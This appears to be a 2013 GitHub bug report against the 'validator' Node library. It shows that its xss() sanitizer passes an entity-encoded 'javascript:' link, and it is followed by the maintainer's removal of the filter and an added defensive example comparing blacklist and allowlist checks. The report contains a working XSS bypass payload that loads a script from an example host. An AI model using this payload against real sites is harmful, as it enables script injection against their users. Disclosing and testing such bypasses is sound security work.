xss() should remove "javascript" #181

taku0 opened this Issue May 6, 2013 · 0 comments



taku0 commented May 6, 2013

xss() removes string "javascript" in attributes; however, this is insufficient since browsers interpret <a href="jav&#x61;script:...">abc</a> as <a href="javascript:...">abc</a>.


var validator = require('validator');

console.log(validator.sanitize("<a href=\"jav&#x61;script:var x=(document).createElement('script');x.src='http://www.example.org';(document).body.appendChild(x);(alert)('')\">abc</a>").xss());


Expected

<a >abc</a>

Actual (version 1.1.1)

<a href="jav&#x61;script:var x=(document).createElement('script');x.src='http://www.example.org';(document).body.appendChild(x);(alert)('')">abc</a>
chriso added a commit that referenced this issue Oct 31, 2013
Remove the XSS filter.
The xss() function was originally a port of the XSS filter from
CodeIgniter. I added it to the library because there wasn't an
alternative at the time. Unfortunately I don't have the time or
expertise to maintain the XSS filter or keep merging upstream

If you need one for your app, I suggest looking at Caja sanitisation
engine maintained by Google. (https://code.google.com/p/google-caja/

Closes #123, #138, #181, #206, #210, #221, #223, #226, #227, #231, #232
chriso closed this Oct 31, 2013
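
An added example, not part of the original issue or of validator's code: it compares a simplified substring check on the raw attribute text with an allowlist applied to the href scheme after character references are decoded, which is the order a browser uses. The function names, the partial entity table and the sample values are assumptions made for illustration.

```javascript
// Added example; all names here are hypothetical, not validator's API.

// Partial table of named character references; a real decoder needs the full HTML list.
const NAMED = { amp: '&', lt: '<', gt: '>', quot: '"', apos: "'", colon: ':', Tab: '\t', NewLine: '\n' };

// Decode character references the way an HTML parser does for attribute values,
// which happens before the URL in href is ever interpreted.
function decodeCharRefs(value) {
  return value.replace(/&#x([0-9a-f]+);?|&#([0-9]+);?|&([a-z]+);/gi, (match, hex, dec, name) => {
    if (name !== undefined) {
      return Object.prototype.hasOwnProperty.call(NAMED, name) ? NAMED[name] : match;
    }
    const cp = hex !== undefined ? parseInt(hex, 16) : parseInt(dec, 10);
    return cp > 0 && cp <= 0x10ffff ? String.fromCodePoint(cp) : '\uFFFD';
  });
}

// Scheme the browser will act on: decode, drop tab/CR/LF, trim leading controls and spaces.
function effectiveScheme(rawHref) {
  const url = decodeCharRefs(rawHref).replace(/[\t\n\r]/g, '').replace(/^[\u0000-\u0020]+/, '');
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(url);
  return m ? m[1].toLowerCase() : null; // null means a relative URL
}

// Simplified model of a substring blacklist applied to the raw attribute text.
function substringFilterAllows(rawHref) {
  return !/javascript/i.test(rawHref);
}

// Allowlist applied to the decoded scheme; relative URLs pass.
const ALLOWED_SCHEMES = new Set(['http', 'https', 'mailto']);
function allowlistAllows(rawHref) {
  const scheme = effectiveScheme(rawHref);
  return scheme === null || ALLOWED_SCHEMES.has(scheme);
}

// Constructed sample attribute values; the first is the form reported in this issue.
const SAMPLES = ['jav&#x61;script:...', 'javascript:...', 'https://www.example.org/', '/docs/index.html'];

function compare(samples) {
  return samples.map((href) => ({
    href,
    scheme: effectiveScheme(href),
    substringFilter: substringFilterAllows(href),
    allowlist: allowlistAllows(href),
  }));
}

console.table(compare(SAMPLES));
```

The first row is the only one where the two checks disagree: the substring check passes the encoded value, while the allowlist rejects it because the decoded scheme is `javascript`.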